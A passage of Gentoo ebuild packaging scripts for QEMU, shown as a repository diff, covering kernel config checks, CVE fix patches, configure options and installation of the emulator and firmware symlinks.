ERROR_TUN="You will need the Universal TUN/TAP driver compiled"
ERROR_TUN+=" into your kernel or loaded as a module to use the"
ERROR_TUN+=" virtual network device if using -net tap."
ERROR_BRIDGE="You will also need support for 802.1d"
ERROR_BRIDGE+=" Ethernet Bridging for some network configurations."
use vhost-net && CONFIG_CHECK+=" ~VHOST_NET"
ERROR_VHOST_NET="You must enable VHOST_NET to have vhost-net"
ERROR_VHOST_NET+=" support"
if use amd64 || use x86 || use amd64-linux || use x86-linux; then
CONFIG_CHECK+=" ~KVM_AMD ~KVM_INTEL"
fi
use python && CONFIG_CHECK+=" ~DEBUG_FS"
ERROR_DEBUG_FS="debugFS support required for kvm_stat"
# Now do the actual checks setup above
check_extra_config
fi
fi
if grep -qs '/usr/bin/qemu-kvm' "${EROOT}"/etc/libvirt/qemu/*.xml; then
eerror "The kvm/qemu-kvm wrappers no longer exist, but your libvirt"
eerror "instances are still pointing to it. Please update your"
eerror "configs in /etc/libvirt/qemu/ to use the -enable-kvm flag"
eerror "and the right system binary (e.g. qemu-system-x86_64)."
die "update your virt configs to not use qemu-kvm"
fi
}
pkg_setup() {
enewgroup kvm 78
}
src_prepare() {
# Alter target makefiles to accept CFLAGS set via flag-o
sed -i -r \
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation.
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${P}-CVE-2015-3456.patch #549404
epatch "${FILESDIR}"/${P}-CVE-2015-3209.patch #551752
epatch "${FILESDIR}"/${P}-CVE-2015-5158.patch #555680
epatch "${FILESDIR}"/${P}-CVE-2015-3214.patch #556052
epatch "${FILESDIR}"/${P}-CVE-2015-5154-1.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5154-2.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5154-3.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5165-1.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-2.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-3.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-4.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-5.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-6.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-7.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5166.patch #556304
epatch "${FILESDIR}"/${P}-virtio-serial.patch #557206
[[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch
# Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY
# Verbose builds
MAKEOPTS+=" V=1"
epatch_user
}
##
# configures qemu based on the build directory and the build type
# we are using.
#
qemu_src_configure() {
debug-print-function ${FUNCNAME} "$@"
local buildtype=$1
local builddir=$2
local static_flag="static-${buildtype}"
# audio options
local audio_opts="oss"
use alsa && audio_opts="alsa,${audio_opts}"
use sdl && audio_opts="sdl,${audio_opts}"
use pulseaudio && audio_opts="pa,${audio_opts}"
local conf_opts=(
--prefix=/usr
--sysconfdir=/etc
--libdir=/usr/$(get_libdir)
--docdir=/usr/share/doc/${PF}/html
--disable-bsd-user
--disable-guest-agent
--disable-strip
--disable-werror
--python="${PYTHON}"
--cc="$(tc-getCC)"
--cxx="$(tc-getCXX)"
--host-cc="$(tc-getBUILD_CC)"
$(use_enable debug debug-info)
$(use_enable debug debug-tcg)
--enable-docs
$(use_enable tci tcg-interpreter)
$(use_enable xattr attr)
)
# Disable options not used by user targets as the default configure
# options will autoprobe and try to link in a bunch of unused junk.
conf_softmmu() {
if [[ ${buildtype} == "user" ]] ; then
echo "--disable-${2:-$1}"
else
use_enable "$@"
fi
}
conf_opts+=(
$(conf_softmmu accessibility brlapi)
$(conf_softmmu aio linux-aio)
$(conf_softmmu bluetooth bluez)
$(conf_softmmu caps cap-ng)
$(conf_softmmu curl)
$(conf_softmmu fdt)
$(conf_softmmu glusterfs)
$(conf_softmmu gtk)
$(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi)
$(conf_softmmu jpeg vnc-jpeg)
$(conf_softmmu kernel_linux kvm)
$(conf_softmmu lzo)
$(conf_softmmu ncurses curses)
$(conf_softmmu nfs libnfs)
$(conf_softmmu numa)
$(conf_softmmu opengl)
$(conf_softmmu png vnc-png)
$(conf_softmmu rbd)
$(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl)
$(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss)
$(conf_softmmu snappy)
$(conf_softmmu spice)
$(conf_softmmu ssh libssh2)
$(conf_softmmu tls quorum)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu tls vnc-ws)
$(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid)
$(conf_softmmu vde)
$(conf_softmmu vhost-net)
$(conf_softmmu virtfs)
$(conf_softmmu vnc)
$(conf_softmmu xen)
$(conf_softmmu xen xen-pci-passthrough)
$(conf_softmmu xfs xfsctl)
)
case ${buildtype} in
user)
conf_opts+=(
--enable-linux-user
--disable-system
--target-list="${user_targets}"
--disable-blobs
--disable-tools
)
;;
softmmu)
conf_opts+=(
--disable-linux-user
--enable-system
--target-list="${softmmu_targets}"
--with-system-pixman
--audio-drv-list="${audio_opts}"
)
use gtk && conf_opts+=( --with-gtkabi=$(usex gtk2 2.0 3.0) )
;;
esac
# Add support for SystemTAP
use systemtap && conf_opts+=( --enable-trace-backend=dtrace )
# We always want to attempt to build with PIE support as it results
# in a more secure binary. But it doesn't work with static or if
# the current GCC doesn't have PIE support.
if use ${static_flag}; then
conf_opts+=( --static --disable-pie )
else
gcc-specs-pie && conf_opts+=( --enable-pie )
fi
einfo "../configure ${conf_opts[*]}"
cd "${builddir}"
../configure "${conf_opts[@]}" || die "configure failed"
# FreeBSD's kernel does not support QEMU assigning/grabbing
# host USB devices yet
use kernel_FreeBSD && \
sed -i -E -e "s|^(HOST_USB=)bsd|\1stub|" "${S}"/config-host.mak
}
src_configure() {
local target
python_setup
softmmu_targets= softmmu_bins=()
user_targets= user_bins=()
for target in ${IUSE_SOFTMMU_TARGETS} ; do
if use "qemu_softmmu_targets_${target}"; then
softmmu_targets+=",${target}-softmmu"
softmmu_bins+=( "qemu-system-${target}" )
fi
done
for target in ${IUSE_USER_TARGETS} ; do
if use "qemu_user_targets_${target}"; then
user_targets+=",${target}-linux-user"
user_bins+=( "qemu-${target}" )
fi
done
[[ -n ${softmmu_targets} ]] && \
einfo "Building the following softmmu targets: ${softmmu_targets}"
[[ -n ${user_targets} ]] && \
einfo "Building the following user targets: ${user_targets}"
if [[ -n ${softmmu_targets} ]]; then
mkdir "${S}/softmmu-build"
qemu_src_configure "softmmu" "${S}/softmmu-build"
fi
if [[ -n ${user_targets} ]]; then
mkdir "${S}/user-build"
qemu_src_configure "user" "${S}/user-build"
fi
}
src_compile() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
default
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
default
fi
}
src_test() {
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
pax-mark m */qemu-system-* #515550
emake -j1 check
emake -j1 check-report.html
fi
}
qemu_python_install() {
python_domodule "${S}/scripts/qmp/qmp.py"
python_doscript "${S}/scripts/kvm/kvm_stat"
python_doscript "${S}/scripts/kvm/vmxcap"
python_doscript "${S}/scripts/qmp/qmp-shell"
python_doscript "${S}/scripts/qmp/qemu-ga-client"
}
src_install() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
emake DESTDIR="${ED}" install
# Install binfmt handler init script for user targets
newinitd "${FILESDIR}/qemu-binfmt.initd-r1" qemu-binfmt
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
emake DESTDIR="${ED}" install
# This might not exist if the test failed. #512010
[[ -e check-report.html ]] && dohtml check-report.html
if use kernel_linux; then
udev_dorules "${FILESDIR}"/65-kvm.rules
fi
if use python; then
python_foreach_impl qemu_python_install
fi
fi
# Disable mprotect on the qemu binaries as they use JITs to be fast #459348
pushd "${ED}"/usr/bin >/dev/null
pax-mark m "${softmmu_bins[@]}" "${user_bins[@]}"
popd >/dev/null
# Install config file example for qemu-bridge-helper
insinto "/etc/qemu"
doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/"
cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt
if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one
rm "${ED}/usr/share/qemu/bios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../seabios/bios.bin /usr/share/qemu/bios.bin
fi
# Remove vgabios since we're using the vgabios packaged one
rm "${ED}/usr/share/qemu/vgabios.bin"
rm "${ED}/usr/share/qemu/vgabios-cirrus.bin"
rm "${ED}/usr/share/qemu/vgabios-qxl.bin"
rm "${ED}/usr/share/qemu/vgabios-stdvga.bin"
rm "${ED}/usr/share/qemu/vgabios-vmware.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../vgabios/vgabios.bin /usr/share/qemu/vgabios.bin
dosym ../vgabios/vgabios-cirrus.bin /usr/share/qemu/vgabios-cirrus.bin
dosym ../vgabios/vgabios-qxl.bin /usr/share/qemu/vgabios-qxl.bin
dosym ../vgabios/vgabios-stdvga.bin /usr/share/qemu/vgabios-stdvga.bin
dosym ../vgabios/vgabios-vmware.bin /usr/share/qemu/vgabios-vmware.bin
fi
# Remove sgabios since we're using the sgabios packaged one
rm "${ED}/usr/share/qemu/sgabios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../sgabios/sgabios.bin /usr/share/qemu/sgabios.bin
fi
# Remove iPXE since we're using the iPXE packaged one
rm "${ED}"/usr/share/qemu/pxe-*.rom
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../ipxe/8086100e.rom /usr/share/qemu/pxe-e1000.rom
dosym ../ipxe/80861209.rom /usr/share/qemu/pxe-eepro100.rom
dosym ../ipxe/10500940.rom /usr/share/qemu/pxe-ne2k_pci.rom
dosym ../ipxe/10222000.rom /usr/share/qemu/pxe-pcnet.rom
dosym ../ipxe/10ec8139.rom /usr/share/qemu/pxe-rtl8139.rom
dosym ../ipxe/1af41000.rom /usr/share/qemu/pxe-virtio.rom
fi
fi
qemu_support_kvm && readme.gentoo_create_doc
}
pkg_postinst() {
if qemu_support_kvm; then
readme.gentoo_print_elog
ewarn "Migration from qemu-kvm instances and loading qemu-kvm created"
ewarn "save states has been removed starting with the 1.6.2 release"
ewarn
ewarn "It is recommended that you migrate any VMs that may be running"
ewarn "on qemu-kvm to a host with a newer qemu and regenerate"
ewarn "any saved states with a newer qemu."
ewarn
ewarn "qemu-kvm was the primary qemu provider in Gentoo through 1.2.x"
if use x86 || use amd64; then
ewarn
ewarn "The /usr/bin/kvm and /usr/bin/qemu-kvm wrappers are no longer"
ewarn "installed. In order to use kvm acceleration, pass the flag"
ewarn "-enable-kvm when running your system target."
fi
fi
if [[ -n ${softmmu_targets} ]] && use kernel_linux; then
udev_reload
fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
}
pkg_info() {
echo "Using:"
echo " $(best_version app-emulation/spice-protocol)"
echo " $(best_version sys-firmware/ipxe)"
echo " $(best_version sys-firmware/seabios)"
if has_version sys-firmware/seabios[binary]; then
echo " USE=binary"
else
echo " USE=''"
fi
echo " $(best_version sys-firmware/vgabios)"
}

602
sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-2.3.1.ebuild vendored
View File

@ -1,602 +0,0 @@
# Copyright 1999-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Id$
EAPI=5
PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils
BACKPORTS=
if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git"
inherit git-2
SRC_URI=""
else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd"
fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \
rbd sasl +seccomp sdl selinux smartcard snappy spice ssh static static-softmmu \
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \
virtfs +vnc xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 sparc32plus"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
IUSE+=" ${use_softmmu_targets} ${use_user_targets}"
# Require at least one softmmu or user target.
# Block USE flag configurations known to not work.
REQUIRED_USE="|| ( ${use_softmmu_targets} ${use_user_targets} )
${PYTHON_REQUIRED_USE}
gtk2? ( gtk )
qemu_softmmu_targets_arm? ( fdt )
qemu_softmmu_targets_microblaze? ( fdt )
qemu_softmmu_targets_ppc? ( fdt )
qemu_softmmu_targets_ppc64? ( fdt )
static? ( static-softmmu static-user )
static-softmmu? ( !alsa !pulseaudio !bluetooth !opengl !gtk !gtk2 )
virtfs? ( xattr )"
# Yep, you need both libcap and libcap-ng since virtfs only uses libcap.
#
# The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )"
SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
>=x11-libs/pixman-0.28.0[static-libs(+)]
aio? ( dev-libs/libaio[static-libs(+)] )
caps? ( sys-libs/libcap-ng[static-libs(+)] )
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
infiniband? ( sys-infiniband/librdmacm:=[static-libs(+)] )
jpeg? ( virtual/jpeg:=[static-libs(+)] )
lzo? ( dev-libs/lzo:2[static-libs(+)] )
ncurses? ( sys-libs/ncurses:0=[static-libs(+)] )
nfs? ( >=net-fs/libnfs-1.9.3[static-libs(+)] )
numa? ( sys-process/numactl[static-libs(+)] )
png? ( media-libs/libpng:0=[static-libs(+)] )
rbd? ( sys-cluster/ceph[static-libs(+)] )
sasl? ( dev-libs/cyrus-sasl[static-libs(+)] )
sdl? ( >=media-libs/libsdl-1.2.11[static-libs(+)] )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( >=app-emulation/spice-0.12.0[static-libs(+)] )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r1[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
X86_FIRMWARE_DEPEND="
>=sys-firmware/ipxe-1.0.0_p20130624
pin-upstream-blobs? (
~sys-firmware/seabios-1.7.5
~sys-firmware/sgabios-0.1_pre8
~sys-firmware/vgabios-0.7a
)
!pin-upstream-blobs? (
sys-firmware/seabios
sys-firmware/sgabios
sys-firmware/vgabios
)"
CDEPEND="
!static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND//\[static-libs(+)]} ) " ${use_softmmu_targets}) )
!static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND//\[static-libs(+)]} ) " ${use_user_targets}) )
qemu_softmmu_targets_i386? ( ${X86_FIRMWARE_DEPEND} )
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
accessibility? ( app-accessibility/brltty )
alsa? ( >=media-libs/alsa-lib-1.0.13 )
bluetooth? ( net-wireless/bluez )
gtk? (
gtk2? ( x11-libs/gtk+:2 )
!gtk2? ( x11-libs/gtk+:3 )
x11-libs/vte:2.90
)
iscsi? ( net-libs/libiscsi )
opengl? ( virtual/opengl )
pulseaudio? ( media-sound/pulseaudio )
python? ( ${PYTHON_DEPS} )
sdl? ( media-libs/libsdl[X] )
smartcard? ( dev-libs/nss !app-emulation/libcacard )
spice? ( >=app-emulation/spice-protocol-0.12.3 )
systemtap? ( dev-util/systemtap )
usbredir? ( >=sys-apps/usbredir-0.6 )
virtfs? ( sys-libs/libcap )
xen? ( app-emulation/xen-tools )"
DEPEND="${CDEPEND}
dev-lang/perl
=dev-lang/python-2*
sys-apps/texinfo
virtual/pkgconfig
kernel_linux? ( >=sys-kernel/linux-headers-2.6.35 )
gtk? ( nls? ( sys-devel/gettext ) )
static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND} ) " ${use_softmmu_targets}) )
static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND} ) " ${use_user_targets}) )
test? (
dev-libs/glib[utils]
sys-devel/bc
)"
RDEPEND="${CDEPEND}
selinux? ( sec-policy/selinux-qemu )
"
STRIP_MASK="/usr/share/qemu/palcode-clipper"
QA_PREBUILT="
usr/share/qemu/openbios-ppc
usr/share/qemu/openbios-sparc64
usr/share/qemu/openbios-sparc32
usr/share/qemu/palcode-clipper
usr/share/qemu/s390-ccw.img
usr/share/qemu/u-boot.e500
"
QA_WX_LOAD="usr/bin/qemu-i386
usr/bin/qemu-x86_64
usr/bin/qemu-alpha
usr/bin/qemu-arm
usr/bin/qemu-cris
usr/bin/qemu-m68k
usr/bin/qemu-microblaze
usr/bin/qemu-microblazeel
usr/bin/qemu-mips
usr/bin/qemu-mipsel
usr/bin/qemu-or32
usr/bin/qemu-ppc
usr/bin/qemu-ppc64
usr/bin/qemu-ppc64abi32
usr/bin/qemu-sh4
usr/bin/qemu-sh4eb
usr/bin/qemu-sparc
usr/bin/qemu-sparc64
usr/bin/qemu-armeb
usr/bin/qemu-sparc32plus
usr/bin/qemu-s390x
usr/bin/qemu-unicore32"
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n
For Intel CPUs the module is called 'kvm-intel'\n
Please review /etc/conf.d/modules for how to load these\n\n
Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login."
qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
use qemu_softmmu_targets_ppc || use qemu_softmmu_targets_ppc64 \
use qemu_softmmu_targets_s390x; then
return 0
fi
return 1
}
pkg_pretend() {
if use kernel_linux && kernel_is lt 2 6 25; then
eerror "This version of KVM requres a host kernel of 2.6.25 or higher."
elif use kernel_linux; then
if ! linux_config_exists; then
eerror "Unable to check your kernel for KVM support"
else
CONFIG_CHECK="~KVM ~TUN ~BRIDGE"
ERROR_KVM="You must enable KVM in your kernel to continue"
ERROR_KVM_AMD="If you have an AMD CPU, you must enable KVM_AMD in"
ERROR_KVM_AMD+=" your kernel configuration."
ERROR_KVM_INTEL="If you have an Intel CPU, you must enable"
ERROR_KVM_INTEL+=" KVM_INTEL in your kernel configuration."
ERROR_TUN="You will need the Universal TUN/TAP driver compiled"
ERROR_TUN+=" into your kernel or loaded as a module to use the"
ERROR_TUN+=" virtual network device if using -net tap."
ERROR_BRIDGE="You will also need support for 802.1d"
ERROR_BRIDGE+=" Ethernet Bridging for some network configurations."
use vhost-net && CONFIG_CHECK+=" ~VHOST_NET"
ERROR_VHOST_NET="You must enable VHOST_NET to have vhost-net"
ERROR_VHOST_NET+=" support"
if use amd64 || use x86 || use amd64-linux || use x86-linux; then
CONFIG_CHECK+=" ~KVM_AMD ~KVM_INTEL"
fi
use python && CONFIG_CHECK+=" ~DEBUG_FS"
ERROR_DEBUG_FS="debugFS support required for kvm_stat"
# Now do the actual checks setup above
check_extra_config
fi
fi
if grep -qs '/usr/bin/qemu-kvm' "${EROOT}"/etc/libvirt/qemu/*.xml; then
eerror "The kvm/qemu-kvm wrappers no longer exist, but your libvirt"
eerror "instances are still pointing to it. Please update your"
eerror "configs in /etc/libvirt/qemu/ to use the -enable-kvm flag"
eerror "and the right system binary (e.g. qemu-system-x86_64)."
die "update your virt configs to not use qemu-kvm"
fi
}
pkg_setup() {
enewgroup kvm 78
}
src_prepare() {
# Alter target makefiles to accept CFLAGS set via flag-o
sed -i -r \
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation.
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${PN}-2.3.0-CVE-2015-3209.patch #551752
epatch "${FILESDIR}"/${PN}-2.3.0-virtio-serial.patch #557206
[[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch
# Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY
# Verbose builds
MAKEOPTS+=" V=1"
epatch_user
}
##
# configures qemu based on the build directory and the build type
# we are using.
#
qemu_src_configure() {
debug-print-function ${FUNCNAME} "$@"
local buildtype=$1
local builddir=$2
local static_flag="static-${buildtype}"
# audio options
local audio_opts="oss"
use alsa && audio_opts="alsa,${audio_opts}"
use sdl && audio_opts="sdl,${audio_opts}"
use pulseaudio && audio_opts="pa,${audio_opts}"
local conf_opts=(
--prefix=/usr
--sysconfdir=/etc
--libdir=/usr/$(get_libdir)
--docdir=/usr/share/doc/${PF}/html
--disable-bsd-user
--disable-guest-agent
--disable-strip
--disable-werror
--python="${PYTHON}"
--cc="$(tc-getCC)"
--cxx="$(tc-getCXX)"
--host-cc="$(tc-getBUILD_CC)"
$(use_enable debug debug-info)
$(use_enable debug debug-tcg)
--enable-docs
$(use_enable tci tcg-interpreter)
$(use_enable xattr attr)
)
# Disable options not used by user targets as the default configure
# options will autoprobe and try to link in a bunch of unused junk.
conf_softmmu() {
if [[ ${buildtype} == "user" ]] ; then
echo "--disable-${2:-$1}"
else
use_enable "$@"
fi
}
conf_opts+=(
$(conf_softmmu accessibility brlapi)
$(conf_softmmu aio linux-aio)
$(conf_softmmu bluetooth bluez)
$(conf_softmmu caps cap-ng)
$(conf_softmmu curl)
$(conf_softmmu fdt)
$(conf_softmmu glusterfs)
$(conf_softmmu gtk)
$(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi)
$(conf_softmmu jpeg vnc-jpeg)
$(conf_softmmu kernel_linux kvm)
$(conf_softmmu lzo)
$(conf_softmmu ncurses curses)
$(conf_softmmu nfs libnfs)
$(conf_softmmu numa)
$(conf_softmmu opengl)
$(conf_softmmu png vnc-png)
$(conf_softmmu rbd)
$(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl)
$(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss)
$(conf_softmmu snappy)
$(conf_softmmu spice)
$(conf_softmmu ssh libssh2)
$(conf_softmmu tls quorum)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu tls vnc-ws)
$(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid)
$(conf_softmmu vde)
$(conf_softmmu vhost-net)
$(conf_softmmu virtfs)
$(conf_softmmu vnc)
$(conf_softmmu xen)
$(conf_softmmu xen xen-pci-passthrough)
$(conf_softmmu xfs xfsctl)
)
case ${buildtype} in
user)
conf_opts+=(
--enable-linux-user
--disable-system
--target-list="${user_targets}"
--disable-blobs
--disable-tools
)
;;
softmmu)
conf_opts+=(
--disable-linux-user
--enable-system
--target-list="${softmmu_targets}"
--with-system-pixman
--audio-drv-list="${audio_opts}"
)
use gtk && conf_opts+=( --with-gtkabi=$(usex gtk2 2.0 3.0) )
;;
esac
# Add support for SystemTAP
use systemtap && conf_opts+=( --enable-trace-backend=dtrace )
# We always want to attempt to build with PIE support as it results
# in a more secure binary. But it doesn't work with static or if
# the current GCC doesn't have PIE support.
if use ${static_flag}; then
conf_opts+=( --static --disable-pie )
else
gcc-specs-pie && conf_opts+=( --enable-pie )
fi
einfo "../configure ${conf_opts[*]}"
cd "${builddir}"
../configure "${conf_opts[@]}" || die "configure failed"
# FreeBSD's kernel does not support QEMU assigning/grabbing
# host USB devices yet
use kernel_FreeBSD && \
sed -i -E -e "s|^(HOST_USB=)bsd|\1stub|" "${S}"/config-host.mak
}
src_configure() {
local target
python_setup
softmmu_targets= softmmu_bins=()
user_targets= user_bins=()
for target in ${IUSE_SOFTMMU_TARGETS} ; do
if use "qemu_softmmu_targets_${target}"; then
softmmu_targets+=",${target}-softmmu"
softmmu_bins+=( "qemu-system-${target}" )
fi
done
for target in ${IUSE_USER_TARGETS} ; do
if use "qemu_user_targets_${target}"; then
user_targets+=",${target}-linux-user"
user_bins+=( "qemu-${target}" )
fi
done
[[ -n ${softmmu_targets} ]] && \
einfo "Building the following softmmu targets: ${softmmu_targets}"
[[ -n ${user_targets} ]] && \
einfo "Building the following user targets: ${user_targets}"
if [[ -n ${softmmu_targets} ]]; then
mkdir "${S}/softmmu-build"
qemu_src_configure "softmmu" "${S}/softmmu-build"
fi
if [[ -n ${user_targets} ]]; then
mkdir "${S}/user-build"
qemu_src_configure "user" "${S}/user-build"
fi
}
src_compile() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
default
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
default
fi
}
src_test() {
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
pax-mark m */qemu-system-* #515550
emake -j1 check
emake -j1 check-report.html
fi
}
qemu_python_install() {
python_domodule "${S}/scripts/qmp/qmp.py"
python_doscript "${S}/scripts/kvm/kvm_stat"
python_doscript "${S}/scripts/kvm/vmxcap"
python_doscript "${S}/scripts/qmp/qmp-shell"
python_doscript "${S}/scripts/qmp/qemu-ga-client"
}
src_install() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
emake DESTDIR="${ED}" install
# Install binfmt handler init script for user targets
newinitd "${FILESDIR}/qemu-binfmt.initd-r1" qemu-binfmt
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
emake DESTDIR="${ED}" install
# This might not exist if the test failed. #512010
[[ -e check-report.html ]] && dohtml check-report.html
if use kernel_linux; then
udev_dorules "${FILESDIR}"/65-kvm.rules
fi
if use python; then
python_foreach_impl qemu_python_install
fi
fi
# Disable mprotect on the qemu binaries as they use JITs to be fast #459348
pushd "${ED}"/usr/bin >/dev/null
pax-mark m "${softmmu_bins[@]}" "${user_bins[@]}"
popd >/dev/null
# Install config file example for qemu-bridge-helper
insinto "/etc/qemu"
doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/"
cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt
if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one
rm "${ED}/usr/share/qemu/bios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../seabios/bios.bin /usr/share/qemu/bios.bin
fi
# Remove vgabios since we're using the vgabios packaged one
rm "${ED}/usr/share/qemu/vgabios.bin"
rm "${ED}/usr/share/qemu/vgabios-cirrus.bin"
rm "${ED}/usr/share/qemu/vgabios-qxl.bin"
rm "${ED}/usr/share/qemu/vgabios-stdvga.bin"
rm "${ED}/usr/share/qemu/vgabios-vmware.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../vgabios/vgabios.bin /usr/share/qemu/vgabios.bin
